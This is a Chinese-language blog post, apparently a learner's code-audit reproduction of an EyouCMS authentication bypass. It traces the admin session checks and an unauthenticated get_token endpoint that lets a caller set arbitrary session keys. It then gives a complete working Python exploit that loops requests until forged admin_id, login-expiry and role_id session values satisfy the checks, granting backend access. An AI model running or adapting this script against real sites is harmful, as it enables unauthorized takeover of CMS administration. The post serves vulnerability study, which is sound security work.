EYouCMS 后台登录绕过
- PHP代码审计,由于自己太菜啦,就先复现前辈们的文章来学习吧,参考下列文章。
- https://forum.butian.net/share/104
后台登录判断
- application/admin/controller/Base.php
- 跟进_initialize方法,定位到第57行
$admin_login_expire = session('admin_login_expire'); // 登录有效期web_login_expiretime
if (session('?admin_id') && getTime() - intval($admin_login_expire) < $web_login_expiretime) {
session('admin_login_expire', getTime()); // 登录有效期
$this->check_priv();//检查管理员菜单操作权限
}else{
/*自动退出*/
adminLog('访问后台');
// 进入后台
}
- 这里获取session,有两个要求
session('?admin_id')这里要求admin_id有值即可,YouDianCMS里面是一样的。然后getTime() - intval($admin_login_expire)这里需要获取当前时间戳-获取admin_login_expire<3600.因此这里获取的session是一个很大的数字。 - 再向下走跟进check_priv方法,当前文件第98行。
if (0 >= intval(session('admin_info.role_id'))) {
//超级管理员无需验证
return true;
- 发现这里只需要获取的session小于等于0即可。
- 总结需要满足以下条件。
admin_id有值getTime() - intval($admin_login_expire)<3600intval(admin_info.role_id)=<0
任意session设置
- application/api/controller/Ajax.php
public function get_token($name = '__token__')
{
if (IS_AJAX) {
echo $this->request->token($name);
exit;
} else {
abort(404);
}
}
- 发现这里没做鉴权,我们能直接访问,同时参数可控,继续跟进token方法。
public function token($name = '__token__', $type = 'md5')
{
$type = is_callable($type) ? $type : 'md5';
$token = call_user_func($type, $_SERVER['REQUEST_TIME_FLOAT']);
if ($this->isAjax()) {
header($name . ': ' . $token);
}
Session::set($name, $token);
return $token;
}
- 发现这里的session设置的键名,我么能够控制,值为MD5加密的时间戳。
- 上面获取的session有两个都转换成了整数,因为MD5加密的原因,我们因此可能遇见的字符开头为数字字符都有可能,因此需要一直请求,直到满足我们的条件为止。
Script
- 因为时间戳MD5加密的原因,导致可能要等很久才能找到我们需要的session。
from time import time,sleep
import requests
import sys
class EyouCMS:
def __init__(self,URL):
self.Req = requests.session()
self.URL = URL
self.SleepTime = 0.5
self.AdminURL = 'login.php?m=admin&c=Admin&a=admin_edit&id=1&lang=cn'
self.Payload = 'index.php/?m=api&c=ajax&a=get_token&name='
self.admin_id = 'admin_id'
self.admin_login_expire = 'admin_login_expire'
self.admin_info_role_id = 'admin_info.role_id'
self.Headers = {
'x-requested-with': 'XMLHttpRequest',
}
def Banner(self):
print("-"*10 + "后台登录绕过" + "-"*10)
def change(self,string):
temp = ''
for n, s in enumerate(string):
if n == 0:
if s.isalpha():
return '0'
break
if s.isdigit():
temp += str(s)
else:
if s.isalpha():
break
return temp
def SetID(self):
res = self.Req.get(self.URL + self.Payload + self.admin_id, headers=self.Headers)
print("admin_id[+]:\t\t\t\t\t" + res.text)
if 'Set-cookie' in res.headers:
print(res.headers['set-cookie'])
if res.status_code != 200:
sys.exit("Api模块请求404")
# print(res.headers)
def SetExpire(self):
while True:
res = self.Req.get(self.URL + self.Payload + self.admin_login_expire, headers=self.Headers)
# print(res.text,end='\t\t\t\t')
# print(self.change(res.text))
if(time()-int(self.change(res.text),10)<3600):
print("admin_login_expire[+]:\t\t\t" + res.text)
# print(res.headers)
break
sleep(self.SleepTime)
def SetRoleID(self):
while True:
res = self.Req.get(self.URL + self.Payload + self.admin_info_role_id, headers=self.Headers)
if(int(self.change(res.text),10)<=0):
print("admin_info.rele_id[+]:\t\t\t" + res.text)
break
sleep(self.SleepTime)
def CheckLogin(self):
res = self.Req.get(self.URL + self.AdminURL, headers=self.Headers)
res.encoding = res.apparent_encoding
if '更换头像' in res.text:
print("OK")
def run(self):
self.SetID()
self.SetExpire()
self.SetRoleID()
self.CheckLogin()
if __name__ == '__main__':
Start = time()
URL = 'http://127.0.0.1/eyoucms/'
e = EyouCMS(URL)
e.run()
End = time()
print(End-Start)
- 最后跑出来cookie,替换后即可成功登录后台。
逆水行舟,不进则退。
